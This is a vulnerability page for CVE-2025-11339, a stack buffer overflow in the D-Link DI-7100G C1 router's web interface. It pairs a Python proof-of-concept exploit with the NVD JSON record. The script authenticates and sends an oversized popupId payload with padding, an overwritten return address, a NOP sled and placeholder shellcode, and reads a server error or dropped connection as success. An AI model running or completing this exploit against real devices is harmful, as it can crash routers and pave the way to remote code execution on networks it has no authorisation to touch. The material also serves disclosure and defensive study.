CVE-2025-11339

# CVE-2025-11339 - D-Link DI-7100G C1 Buffer Overflow PoC # Vulnerability: Buffer overflow in sub_4BD4F8 of /webchat/hi_block.asp via popupId parameter # Affected: D-Link DI-7100G C1 (firmware up to 20250928) # CVSS 3.1: 8.8 (HIGH) import requests import sys from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) TARGET_URL = "http://{target}/webchat/hi_block.asp" BUFFER_SIZE = 1024 # Adjust based on target architecture def generate_payload(): """ Generate a buffer overflow payload targeting the popupId parameter. The sub_4BD4F8 function does not properly validate the length of popupId, allowing stack-based buffer overflow. """ # Padding to overflow the local buffer padding = b"A" * BUFFER_SIZE # Overwrite saved return address (example: address of controlled memory) # In a real exploit, this would be replaced with a valid gadget address ret_address = b"\x41\x41\x41\x41" # NOP sled + shellcode placeholder nop_sled = b"\x90" * 64 shellcode_placeholder = b"\xcc" * 32 # INT3 breakpoint for debugging payload = padding + ret_address + nop_sled + shellcode_placeholder return payload def exploit(target_ip, username, password): """ Exploit CVE-2025-11339 against D-Link DI-7100G C1. Requires low-privilege authentication (PR:L). """ session = requests.Session() login_url = f"http://{target_ip}/login.asp" target_endpoint = TARGET_URL.format(target=target_ip) # Step 1: Authenticate with low-privilege credentials login_data = { "username": username, "password": password } try: session.post(login_url, data=login_data, verify=False, timeout=10) except Exception as e: print(f"[-] Login failed: {e}") return False # Step 2: Send crafted request with oversized popupId parameter payload = generate_payload() exploit_params = { "popupId": payload.decode('latin-1') } print(f"[*] Sending exploit payload to {target_endpoint}") try: response = session.post( target_endpoint, data=exploit_params, verify=False, timeout=10 ) print(f"[*] Response status: {response.status_code}") # If the server crashes or returns unexpected response, exploit may have succeeded if response.status_code == 500 or response.status_code == 502: print("[+] Target may be vulnerable - server error triggered") return True except requests.exceptions.RequestException as e: print(f"[+] Connection failed - target may have crashed: {e}") return True return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>") print(f"Example: {sys.argv[0]} 192.168.0.1 admin admin") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit(target, user, pwd)

{"cve": {"id": "CVE-2025-11339", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:04.683", "lastModified": "2025-11-19T21:47:37.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in D-Link DI-7100G C1 up to 20250928. This issue affects the function sub_4BD4F8 of the file /webchat/hi_block.asp of the component jhttpd. The manipulation of the argument popupId leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:*", "matchCriteriaId": "7A967144-1055-4FC2-97F7-8E486F6D6D53"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B661C392-F07F-4BF5-B559-B00693C63E94"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327222", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327222", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664635", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/zr11zfssl8h74bn3", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/zr11zfssl8h74bn3#Wjajr", "source": "[email protected]", "tags": ["Permissions Required"]}]}}